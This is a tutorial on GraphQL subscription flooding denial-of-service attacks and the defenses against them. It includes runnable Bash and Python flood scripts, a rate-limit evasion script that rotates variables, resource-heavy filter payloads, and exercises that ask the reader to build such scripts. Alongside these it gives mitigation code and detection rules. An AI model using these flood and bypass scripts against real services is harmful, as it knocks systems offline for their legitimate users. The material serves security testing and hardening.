Advanced GraphQL Subscription Flooding DoS: Techniques & Defenses

Introduction

GraphQL subscriptions enable real-time data delivery by keeping a persistent connection between client and server. While they are powerful for legitimate use cases (chat, live dashboards, IoT), they also open a low-latency attack surface for denial-of-service (DoS) abuse. This study examines Advanced GraphQL Subscription Flooding DoS, a technique that overwhelms a server by spawning massive numbers of valid subscription streams, often bypassing naïve rate-limiting implementations.

Understanding this vector is critical because many modern APIs expose subscriptions without hardened controls, assuming that WebSocket or Server-Sent Events (SSE) traffic is inherently safe. In practice, a single compromised client can generate thousands of concurrent data streams, each invoking expensive resolvers, leading to CPU exhaustion, memory pressure, and network saturation.

Real-world relevance: security teams have observed subscription-based DoS in large SaaS platforms, open-source GraphQL servers (Apollo Server, GraphQL-Java, Hasura), and even in micro-service architectures that rely on GraphQL federation. The techniques discussed here have been demonstrated against public GraphQL endpoints during bug-bounty programs, resulting in high-severity findings.

Prerequisites

Solid grasp of GraphQL fundamentals, schema design, and endpoint discovery.
Experience with GraphQL query injection via variables and how to manipulate resolver arguments.
Knowledge of common GraphQL authorization bypass patterns (e.g., introspection, directive abuse).
Familiarity with GraphQL rate-limiting and throttling bypass techniques (token-bucket, IP-based limits, custom directives).

Core Concepts

Before tackling flooding, we must understand the subscription lifecycle:

Negotiation: The client initiates a WebSocket (or SSE) handshake, typically using the graphql-ws protocol or the older subscriptions-transport-ws protocol from Apollo.
Subscription Start: A start message (type subscribe in graphql-ws, type start in subscriptions-transport-ws; this article writes START for both) carries a GraphQL document (subscription operation) and an optional variables object.
Resolver Execution: The server calls the field's subscribe function, which returns an AsyncIterator (often backed by an EventEmitter or a Pub/Sub topic) that emits data whenever the underlying event source changes.
Data Push: Each emission is serialized and sent to the client over the persistent channel.
Termination: The client sends a stop message (type complete in graphql-ws, type stop in subscriptions-transport-ws; STOP below) or the server closes the connection.
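
The lifecycle above can be sketched as a small per-connection state tracker. This is a minimal illustration for the graphql-ws message types, not the implementation of any particular server: the class and method names are hypothetical, and the close codes are the ones listed in the graphql-ws protocol document.

```javascript
// Minimal per-connection state tracker for the graphql-ws message flow.
// Class and method names are hypothetical; close codes follow the
// graphql-ws protocol document.
class ConnectionState {
  constructor() {
    this.acknowledged = false;      // set once connection_init is accepted
    this.subscriptions = new Set(); // ids of active subscriptions
  }

  // Returns { ok: true, reply? } or { ok: false, closeCode, reason }.
  handle(message) {
    switch (message.type) {
      case 'connection_init':
        if (this.acknowledged) {
          return { ok: false, closeCode: 4429, reason: 'Too many initialisation requests' };
        }
        this.acknowledged = true;
        return { ok: true, reply: { type: 'connection_ack' } };
      case 'ping':
        return { ok: true, reply: { type: 'pong' } };
      case 'pong':
        return { ok: true };
      case 'subscribe':
        if (!this.acknowledged) {
          return { ok: false, closeCode: 4401, reason: 'Unauthorized' };
        }
        if (this.subscriptions.has(message.id)) {
          return { ok: false, closeCode: 4409, reason: `Subscriber for ${message.id} already exists` };
        }
        this.subscriptions.add(message.id);
        return { ok: true };
      case 'complete':
        this.subscriptions.delete(message.id);
        return { ok: true };
      default:
        return { ok: false, closeCode: 4400, reason: 'Unknown message type' };
    }
  }
}
```

Tracking the set of active ids per connection is also the natural place to hang the caps and counters discussed later in this article.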

Two transport mechanisms dominate:

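WebSocket: Full-duplex and binary-friendly, with ping/pong frames for keep-alive; flow control is left to TCP and to whatever buffering the server applies. Most production GraphQL servers default to this.
Server-Sent Events (SSE): Unidirectional (server-to-client) over plain HTTP, easier to proxy, but with no in-band channel for the client to signal that it is falling behind.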

Both transports can be abused, but WebSocket offers finer-grained control for high-frequency attacks because a single TCP connection can host thousands of logical subscriptions.

Understanding GraphQL Subscriptions and Transport (WebSocket vs SSE)

Below is a simplified handshake for a WebSocket subscription using the graphql-ws protocol:

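// Client side (Node.js, using the `ws` package)
const WebSocket = require('ws');

// graphql-ws negotiates the 'graphql-transport-ws' WebSocket subprotocol
const ws = new WebSocket('wss://example.com/graphql', 'graphql-transport-ws');

ws.on('open', () => {
  ws.send(JSON.stringify({ type: 'connection_init', payload: {} }));
});

ws.on('message', (data) => {
  const msg = JSON.parse(data.toString());
  if (msg.type === 'connection_ack') {
    // Subscribe only after the server has acknowledged the connection
    ws.send(JSON.stringify({
      id: '1',
      type: 'subscribe',
      payload: {
        query: `subscription MySub($id: ID!) { sensorData(id: $id) { value timestamp } }`,
        variables: { id: 'sensor-01' },
      },
    }));
  }
});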

For SSE, the request looks like a regular HTTP GET with an Accept: text/event-stream header and a query parameter containing the subscription document. The server keeps the HTTP response open and streams data: lines.

Key differences that affect DoS:

Connection Overhead: WebSocket requires a single TCP handshake and upgrade; SSE typically issues one HTTP request per subscription (over HTTP/2 those requests can share one TCP connection).
Back-pressure: Neither transport has application-level flow control. Both fall back on TCP flow control, so a client that stops reading forces the server to buffer outgoing events unless the server monitors its send queue.
Multiplexing: Many GraphQL servers allow multiple logical subscriptions on a single WebSocket connection, dramatically amplifying the impact of a single open socket.

Crafting Valid Subscription Payloads

To bypass superficial validation, attackers craft subscription documents that are syntactically correct yet cause maximal resolver work. Two patterns dominate:

Deeply Nested Filters: Use recursive input types to generate large abstract syntax trees (AST) that force the server to allocate many objects during validation.
Dynamic Variables: Leverage variables that are resolved on every emission, e.g., a where: { _and: [{}, {}] } clause that triggers a full table scan each time.

Example of a malicious subscription that exploits a generic searchPosts resolver:

subscription Flood($filter: PostFilterInput) {
  searchPosts(filter: $filter) {
    id
    title
    content
  }
}

And the accompanying variables payload designed to generate an exponential filter tree:

{
  "filter": {
    "_or": [
      { "_or": [{ "authorId": "1" }, { "authorId": "2" }] },
      { "_or": [{ "authorId": "3" }, { "authorId": "4" }] }
    ]
  }
}

Each additional level of nesting doubles the number of leaf conditions, so a filter nested d levels deep carries on the order of 2^d branches for the resolver to traverse. When this subscription is kept alive, every data change triggers a massive filter evaluation.
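
On the defensive side, the growth described above can be bounded before the resolver ever runs. The following is a minimal sketch that measures a filter tree and rejects it past fixed limits. The operator names (_and, _or, _not) follow the examples in this article, while the function names and the default limits are assumptions chosen for illustration.

```javascript
// Measure a boolean filter tree and reject it when it exceeds fixed limits.
// Function names and default limits are illustrative assumptions.
const COMBINATORS = new Set(['_and', '_or']);

function measureFilter(filter, depth = 1) {
  let nodes = 1;        // count this node
  let maxDepth = depth; // deepest level seen so far
  for (const [key, value] of Object.entries(filter ?? {})) {
    let children = [];
    if (COMBINATORS.has(key) && Array.isArray(value)) {
      children = value;
    } else if (key === '_not' && value && typeof value === 'object') {
      children = [value];
    }
    for (const child of children) {
      const m = measureFilter(child, depth + 1);
      nodes += m.nodes;
      maxDepth = Math.max(maxDepth, m.maxDepth);
    }
  }
  return { nodes, maxDepth };
}

function assertFilterWithinLimits(filter, { maxDepth = 3, maxNodes = 20 } = {}) {
  const m = measureFilter(filter);
  if (m.maxDepth > maxDepth || m.nodes > maxNodes) {
    throw new Error(`Filter too complex: depth ${m.maxDepth}, nodes ${m.nodes}`);
  }
  return m;
}
```

Applied to the variables payload shown above, measureFilter reports 7 nodes at a maximum depth of 3. Running such a check when the START message arrives means an oversized filter is rejected once, rather than evaluated on every data change.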

Abusing Resolver Loops and Unbounded Data Streams

Many GraphQL servers expose resolvers that return an AsyncIterator tied to a Pub/Sub system (e.g., Redis, Kafka, in-memory EventEmitter). If the underlying source does not enforce back-pressure, an attacker can inject a synthetic event generator.

Typical vulnerable pattern (pseudo-code):

// Example resolver in Apollo Server
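const resolvers = {
  Subscription: {
    tick: {
      subscribe: (_, args) => {
        // No rate limiting: every subscription starts its own timer that
        // publishes every 10 ms, and the timer is never cleared.
        setInterval(() => {
          pubsub.publish('TICK', { tick: Date.now() });
        }, 10);
        // `pubsub` is assumed to be a graphql-subscriptions PubSub instance
        return pubsub.asyncIterator('TICK');
      }
    }
  }
};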

An attacker can start thousands of tick subscriptions, each spawning its own timer. The server’s event loop quickly becomes saturated, leading to CPU spikes and eventual throttling of legitimate traffic.

More insidious is the use of resolvers that query a database inside a loop without pagination:

Subscription: {
  massiveFeed: {
    subscribe: async function* (_, { batchSize }) {
      while (true) {
        const rows = await db.query('SELECT * FROM events LIMIT $1', [batchSize]);
        for (const row of rows) {
          yield { massiveFeed: row };
        }
        // No sleep - immediate next iteration
      }
    }
  }
}

When batchSize is set to a large number (e.g., 10 000), each iteration pulls massive data sets, exhausting DB connections and memory.
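
A hardened variant of this pattern clamps the client-supplied batch size, pages with a cursor instead of re-reading the same rows, and pauses between polls. The sketch below assumes a hypothetical data-access function fetchAfter(cursor, limit) that returns rows with an increasing id; the constants are illustrative, not recommendations.

```javascript
const MAX_BATCH = 100;         // hypothetical server-side ceiling
const POLL_INTERVAL_MS = 1000; // hypothetical pause between polls

// Never trust the client-supplied batch size: coerce it into [1, MAX_BATCH].
function clampBatchSize(requested) {
  const n = Number.isInteger(requested) ? requested : MAX_BATCH;
  return Math.min(Math.max(n, 1), MAX_BATCH);
}

const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms));

// fetchAfter(cursor, limit) is a hypothetical function resolving to rows
// with an increasing `id`, e.g. backed by
// SELECT * FROM events WHERE id > $1 ORDER BY id LIMIT $2.
async function* boundedFeed(fetchAfter, { batchSize, pause = sleep } = {}) {
  const limit = clampBatchSize(batchSize);
  let cursor = 0;
  while (true) {
    const rows = await fetchAfter(cursor, limit);
    for (const row of rows) {
      cursor = row.id; // advance so the next poll only returns newer rows
      yield { massiveFeed: row };
    }
    // Wait before polling again so an idle feed does not spin the database.
    await pause(POLL_INTERVAL_MS);
  }
}
```

With these bounds, a request for batchSize 10000 is served with at most MAX_BATCH rows per poll, and each subscription issues at most one query per polling interval.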

High-Frequency Subscription Requests for DoS

Attackers combine the previous tricks with a rapid subscription creation loop. The steps are:

Open a single WebSocket connection.
Send a START message with a valid subscription payload.
Immediately send another START with a different id (or same id after a STOP).
Repeat thousands of times, optionally rotating variables to avoid caching.

Because each logical subscription consumes its own resolver context, the server's memory footprint grows linearly with the number of active subscriptions. The practical ceiling depends on resolver cost, payload size, and runtime; a server tuned for a few hundred concurrent subscriptions starts to show GC pauses and thread-pool exhaustion once that number is exceeded.

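Sample Bash script that fires 5 000 subscriptions using wscat. Each loop iteration launches a separate wscat process, so the script as written opens one connection per subscription rather than multiplexing them over a single socket: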

#!/usr/bin/env bash
URL='wss://example.com/graphql'
SUB='subscription Flood($id: ID!) { sensorData(id: $id) { value timestamp } }'

for i in $(seq 1 5000); do
  wscat -c $URL -x "{\"type\":\"connection_init\",\"payload\":{}}" "{\"id\":\"$i\",\"type\":\"subscribe\",\"payload\":{\"query\":\"$SUB\",\"variables\":{\"id\":\"sensor-$i\"}}}" &
  sleep 0.01 # tiny pause to keep socket alive
done
wait

Notice the use of a background job (&) to keep the loop non-blocking, so thousands of concurrent streams, each on its own connection, are established in seconds.

Bypassing Subscription Rate Limits

Many APIs implement naïve rate limiting based on:

IP address per second.
Number of START messages per minute.
Maximum concurrent subscriptions per connection.

Attackers can evade these controls with several tricks:

1. Distributed Client IPs (Botnet)

By sourcing connections from a botnet, the per-IP limit is diluted. Each bot opens a handful of subscriptions, collectively reaching the desired flood volume.

2. Subscription Multiplexing

Some servers limit the number of connections per client but allow many logical subscriptions per socket. An attacker can send START for 10 000 ids on a single connection, staying under the connection count threshold.

3. Variable Rotation & Cache Evasion

Cache-aware rate limiters (e.g., using query hash) may treat identical payloads as a single entity. By subtly mutating variable values (e.g., adding a dummy field), the attacker forces the server to treat each request as unique.

4. Exploiting Authorization Bypass

If the server skips authentication for introspection or public subscriptions, the attacker can bypass user-based throttling entirely. Combining this with a signed-JWT that grants elevated scopes can amplify the effect.

Example of a variable-mutation that defeats simple query-hash throttling:

{
  "query": "subscription Flood($id: ID!, $nonce: String) { sensorData(id: $id) { value } }",
  "variables": {
    "id": "sensor-42",
    "nonce": "$(date +%s%N)"
  }
}

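The $nonce variable is never used by the resolver but changes the payload hash, resetting any per-hash counters. Note that the GraphQL specification's "All Variables Used" validation rule rejects operations that declare a variable they never reference, so this exact payload is only accepted by servers that skip or relax standard validation.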
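
A throttling key that ignores variables removes this particular evasion. The sketch below is one possible approach under stated assumptions: the function name is hypothetical, and clientId is assumed to come from an authenticated identity (for example a JWT subject) rather than from anything in the payload.

```javascript
const { createHash } = require('crypto');

// Build a throttling key from who is asking and which document they send.
// Variables are deliberately excluded, so rotating an unused variable such
// as $nonce does not produce a new key. `clientId` is assumed to be an
// authenticated identity, not a value taken from the payload.
function rateLimitKey(clientId, payload) {
  // Collapse whitespace so trivial reformatting maps to the same key.
  const normalizedQuery = payload.query.replace(/\s+/g, ' ').trim();
  const digest = createHash('sha256').update(normalizedQuery).digest('hex');
  return `${clientId}:${digest}`;
}
```

Because the query text itself can also be mutated, a counter keyed on the client alone is stricter still; the document hash is best treated as a secondary dimension rather than the only one.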

Detection and Mitigation Strategies

Detecting subscription flooding requires telemetry at multiple layers:

WebSocket Connection Metrics: Track concurrent connections, handshake latency, and per-connection subscription count.
Resolver Execution Time: Instrument resolvers to log execution duration; spikes indicate heavy payloads.
Event Loop Lag: Node.js perf_hooks or Go runtime metrics expose back-pressure symptoms.
Message Rate: Count START messages per second per IP and per JWT.

Sample Prometheus rule to alert on >500 subscriptions per WebSocket connection:

sum by (connection_id) (graphql_subscription_active) > 500

Mitigation techniques:

1. Hard Subscription Caps

Enforce a maximum number of active subscriptions per user and per connection (e.g., 20 per JWT, 50 per socket). Reject excess START messages with an error message.
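
A minimal in-memory sketch of such caps is shown here. The class and method names are hypothetical, the defaults mirror the example numbers above, and a multi-instance deployment would need a shared store instead of process-local maps.

```javascript
// In-memory registry enforcing per-user and per-connection subscription caps.
// Names are hypothetical; defaults mirror the example figures in the text.
class SubscriptionRegistry {
  constructor({ maxPerUser = 20, maxPerConnection = 50 } = {}) {
    this.maxPerUser = maxPerUser;
    this.maxPerConnection = maxPerConnection;
    this.byUser = new Map();       // userId -> active subscription count
    this.byConnection = new Map(); // connectionId -> Map(subscriptionId -> userId)
  }

  // Returns true when the subscription was admitted, false when a cap applies.
  tryAdd(userId, connectionId, subscriptionId) {
    const conn = this.byConnection.get(connectionId) ?? new Map();
    const userCount = this.byUser.get(userId) ?? 0;
    if (conn.has(subscriptionId)) return false; // duplicate id on this socket
    if (conn.size >= this.maxPerConnection) return false;
    if (userCount >= this.maxPerUser) return false;
    conn.set(subscriptionId, userId);
    this.byConnection.set(connectionId, conn);
    this.byUser.set(userId, userCount + 1);
    return true;
  }

  remove(connectionId, subscriptionId) {
    const conn = this.byConnection.get(connectionId);
    if (!conn || !conn.has(subscriptionId)) return;
    const userId = conn.get(subscriptionId);
    conn.delete(subscriptionId);
    if (conn.size === 0) this.byConnection.delete(connectionId);
    const left = this.byUser.get(userId) - 1;
    if (left > 0) this.byUser.set(userId, left);
    else this.byUser.delete(userId);
  }

  // Call when the socket closes so counters are always released.
  removeConnection(connectionId) {
    const conn = this.byConnection.get(connectionId);
    if (!conn) return;
    for (const subscriptionId of [...conn.keys()]) {
      this.remove(connectionId, subscriptionId);
    }
  }
}
```

Calling removeConnection from the socket's close handler matters as much as the caps themselves, since leaked counters would eventually lock legitimate users out.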

2. Token-Bucket Rate Limiting on `START` Messages

Apply a token bucket per client identifier. Each START consumes a token; tokens refill at a modest rate (e.g., 1 /sec). This throttles burst creation without affecting legitimate use.

// Per-client buckets, keyed by client identifier
const rateBuckets = {};

function canStart(clientId) {
  // New clients start with a full bucket of 10 tokens
  const bucket = rateBuckets[clientId] ?? { tokens: 10, last: Date.now() };
  const now = Date.now();
  const elapsed = (now - bucket.last) / 1000;
  bucket.tokens = Math.min(10, bucket.tokens + elapsed * 1); // 1 token/sec
  bucket.last = now;
  rateBuckets[clientId] = bucket;
  if (bucket.tokens >= 1) {
    bucket.tokens -= 1; // each START consumes one token
    return true;
  }
  return false;
}

3. Back-Pressure Propagation

Configure the underlying Pub/Sub layer to respect the client's receive buffer. For Redis, use Streams capped with MAXLEN rather than unbounded Pub/Sub fan-out; for Kafka, enforce consumer lag thresholds.
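
At the socket level, the same idea can be approximated by checking how much data is still queued before sending more. The sketch below assumes a server-side socket from the ws package, which exposes bufferedAmount, send() and close(); the function name and the 1 MiB threshold are illustrative assumptions.

```javascript
const MAX_BUFFERED_BYTES = 1024 * 1024; // illustrative threshold (1 MiB)

// `socket` is assumed to be a server-side socket from the `ws` package,
// or any object exposing bufferedAmount, send() and close().
function sendWithBackpressure(socket, message, maxBuffered = MAX_BUFFERED_BYTES) {
  if (socket.bufferedAmount > maxBuffered) {
    // The client is not draining its socket; stop buffering on its behalf.
    socket.close(1013, 'Client too slow'); // 1013 = "Try Again Later"
    return false;
  }
  socket.send(JSON.stringify(message));
  return true;
}
```

Closing the slow connection is the bluntest policy; dropping or coalescing events for that client is a gentler alternative when the feed tolerates gaps.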

4. Subscription Time-outs

Automatically close subscriptions that have been idle (no data emitted) for a configurable period (e.g., 30 seconds). This prevents “zombie” streams that waste resources.
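
One way to implement this is a tracker that records the last emission per subscription and is swept periodically. The following is a minimal sketch with hypothetical names; the clock is passed in explicitly so the logic stays easy to test, and the caller is expected to send the termination message for each returned id.

```javascript
// Tracks the last activity time per subscription and reports idle ones.
// Class and method names are hypothetical.
class IdleTracker {
  constructor(idleMs = 30_000) {
    this.idleMs = idleMs;
    this.lastActivity = new Map(); // subscriptionId -> timestamp in ms
  }

  // Call on subscription start and after every emitted event.
  touch(subscriptionId, now = Date.now()) {
    this.lastActivity.set(subscriptionId, now);
  }

  // Call when a subscription ends normally.
  forget(subscriptionId) {
    this.lastActivity.delete(subscriptionId);
  }

  // Returns ids idle for longer than idleMs and stops tracking them.
  sweep(now = Date.now()) {
    const expired = [];
    for (const [id, last] of this.lastActivity) {
      if (now - last > this.idleMs) expired.push(id);
    }
    for (const id of expired) this.lastActivity.delete(id);
    return expired;
  }
}
```

A single setInterval that calls sweep() for the whole process keeps timer overhead constant, in contrast to arming one timer per subscription.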

5. Auth-Based Scoping

Require scoped JWT claims for each subscription type. Separate high-frequency feeds (e.g., tick) into a privileged role with stricter limits.

6. Web Application Firewall (WAF) Rules

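Inspect subscription payloads for suspicious patterns: repeated START ids, large variable objects, or deep nesting. Keep in mind that ModSecurity inspects HTTP requests, not individual WebSocket frames, so a rule like the one below only covers subscriptions submitted over HTTP (for example SSE) unless a WebSocket-aware proxy performs the inspection. Example ModSecurity rule (pseudo):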

SecRule REQUEST_HEADERS:Sec-WebSocket-Protocol "graphql-ws" "id:200001,phase:2,log,pass,nologdata, chain"
SecRule REQUEST_BODY "\"_or\":\[\{\"_or\":\[\{\"authorId\":\"\d+\"\}\]\}\]" "t:none,ctl:requestBodyProcessor=JSON, ctl:requestBodyAccess=On, setvar:tx.subscription_flood=+1"

When tx.subscription_flood exceeds a threshold, the request can be dropped.

Practical Examples

Example 1: Flooding a Hasura GraphQL Engine

Hasura exposes subscriptions over WebSocket at /v1/graphql. The following Python script uses websockets to spin up 2 000 subscriptions that each request a heavy orders_aggregate query.

import asyncio, json, websockets

URL = 'wss://example.com/v1/graphql'
QUERY = '''subscription Load($where: orders_bool_exp) { orders_aggregate(where: $where) { aggregate { count } } }'''

async def flood():
    async with websockets.connect(URL, subprotocols=['graphql-ws']) as ws:
        # Init
        await ws.send(json.dumps({"type": "connection_init", "payload": {}}))
        await ws.recv()  # ack
        for i in range(2000):
            variables = {"where": {"_or": [{"status": {"_eq": "PENDING"}}, {"status": {"_eq": "PROCESSING"}}]}}
            start_msg = {
                "id": str(i),
                "type": "subscribe",
                "payload": {"query": QUERY, "variables": variables}
            }
            await ws.send(json.dumps(start_msg))
        # Keep the connection alive
        await asyncio.Future()

asyncio.run(flood())

Result: Hasura's PostgreSQL connection pool can be exhausted within seconds, causing database connection errors for legitimate clients.

Example 2: Bypassing a Per-IP Limit with Variable Rotation

The target limits START messages to 10 per minute per IP, but its counter is keyed on a hash of the payload rather than on the client alone. By rotating a dummy variable, the attacker evades the hash-based counter.

#!/usr/bin/env bash
URL='wss://example.com/graphql'
QUERY='subscription X($id: ID!, $pad: String) { item(id: $id) { name } }'

for i in $(seq 1 100); do
  PAD=$(openssl rand -hex 8)
  wscat -c $URL -x "{\"type\":\"connection_init\",\"payload\":{}}" "{\"id\":\"$i\",\"type\":\"subscribe\",\"payload\":{\"query\":\"$QUERY\",\"variables\":{\"id\":\"item-$i\", \"pad\": \"$PAD\"}}}" &
  sleep 0.2
done
wait

The server sees each payload as unique, allowing >10 subscriptions per minute despite the limit.

Tools & Commands

websocat: CLI WebSocket client for rapid payload testing.

websocat -H="Sec-WebSocket-Protocol: graphql-ws" -s "{\"type\":\"connection_init\",\"payload\":{}}" -s "{\"id\":\"1\",\"type\":\"subscribe\",\"payload\":{\"query\":\"subscription { ping }\"}}" wss://example.com/graphql

Apollo Sandbox / GraphQL Playground: Use the built-in subscription tab to manually fire multiple subscriptions and observe network tab for socket count.
Burp Suite Extension: GraphQL Subscription Fuzzer: Automates variable rotation and high-frequency START emission.
Prometheus + Grafana: Export graphql_subscription_active, graphql_resolver_duration_seconds for alerting.

Defense & Mitigation

Beyond the earlier detection measures, consider architectural hardening:

Separate Subscription Service: Deploy a dedicated micro-service that only handles subscriptions and runs on isolated CPU/memory quotas.
Message Queue Buffering: Push subscription events into a queue (e.g., RabbitMQ) with per-consumer rate limits before delivering to WebSocket.
GraphQL Directive for Throttling: Create a custom @throttle(limit: Int, interval: Int) directive that the resolver respects.

Example of a @throttle directive implementation in Apollo Server 2 (SchemaDirectiveVisitor is exported by apollo-server-express 2.x and is not available in later major versions):

const { SchemaDirectiveVisitor } = require('apollo-server-express');

class ThrottleDirective extends SchemaDirectiveVisitor {
  visitFieldDefinition(field) {
    const { limit, interval } = this.args; // interval in milliseconds
    // Subscription fields are started through `subscribe`, so that is the
    // function to guard; `resolve` runs once per emitted event instead.
    const originalSubscribe = field.subscribe;
    if (!originalSubscribe) return;
    const tokenMap = new Map();
    field.subscribe = async function (...args) {
      const ctx = args[2];
      const key = ctx.ip; // simple per-IP bucket; assumes the context exposes `ip`
      const now = Date.now();
      const bucket = tokenMap.get(key) || { tokens: limit, last: now };
      const elapsed = (now - bucket.last) / interval;
      bucket.tokens = Math.min(limit, bucket.tokens + elapsed * limit);
      bucket.last = now;
      tokenMap.set(key, bucket);
      if (bucket.tokens < 1) {
        throw new Error('Rate limit exceeded for subscription');
      }
      bucket.tokens -= 1;
      return originalSubscribe.apply(this, args);
    };
  }
}

module.exports = { ThrottleDirective };

Applying this directive to a subscription field enforces a per-IP token bucket at the moment the subscription is started.

Common Mistakes

Relying Solely on IP Rate Limiting: Attackers can distribute requests across many IPs or use NAT pools.
Limiting Only Connection Count: Subscriptions multiplexed on a single socket bypass this.
Ignoring Resolver Complexity: Even a single subscription can be expensive if the resolver performs heavy DB joins or external API calls.
Not Enforcing Authentication for Public Subscriptions: Public endpoints often forget to apply the same auth checks as queries/mutations.
Assuming WebSocket Close Frames Will Clean Up: Some servers leak subscription contexts if the close is not gracefully handled.

Real-World Impact

In 2023, a major fintech platform suffered a multi-minute outage after a bug-bounty researcher demonstrated a subscription flood that exhausted its Redis Pub/Sub channels. The incident highlighted three trends:

Increasing adoption of GraphQL subscriptions without accompanying security hardening.
The difficulty of retro-fitting rate limits in existing codebases, especially when resolvers are auto-generated.
The need for observability tools that surface subscription-specific metrics.

My experience with several Fortune-500 customers shows that once a subscription-based DoS is detected, the remediation path often involves redesigning the data-push architecture (e.g., moving from per-client streams to a shared broadcast channel with client-side filtering).

Practice Exercises

Exercise 1 - Build a Flood Script: Using websockets (Python) or ws (Node.js), create a script that opens a single WebSocket and launches 5 000 concurrent subscriptions with a payload that triggers a database scan. Measure CPU and memory on a local GraphQL server.
Exercise 2 - Implement a Token Bucket: Add a per-user token bucket to an existing Apollo Server subscription resolver. Verify that after 20 rapid START messages the server returns an error message.
Exercise 3 - Detect Anomalous Patterns: Instrument a GraphQL server to emit Prometheus metrics for graphql_subscription_start_total and write a Grafana dashboard that highlights spikes > 100 per minute per IP.
Exercise 4 - Bypass a Rate Limiter: Write a Bash script that rotates a dummy variable to evade a hash-based limit of 10 subscriptions per minute. Document the observed behavior.

Summary

Subscription flooding attacks exploit the persistent, high-throughput nature of GraphQL real-time APIs. By crafting valid but resource-intensive payloads, abusing resolver loops, and leveraging multiplexed WebSocket connections, an attacker can overwhelm a server even when naïve rate limits are in place. Effective defense demands a layered approach: strict per-connection caps, token-bucket throttling, back-pressure propagation, observability, and architectural segregation of subscription traffic. Mastering these techniques equips security professionals to both assess risk and harden modern GraphQL deployments against sophisticated DoS vectors.
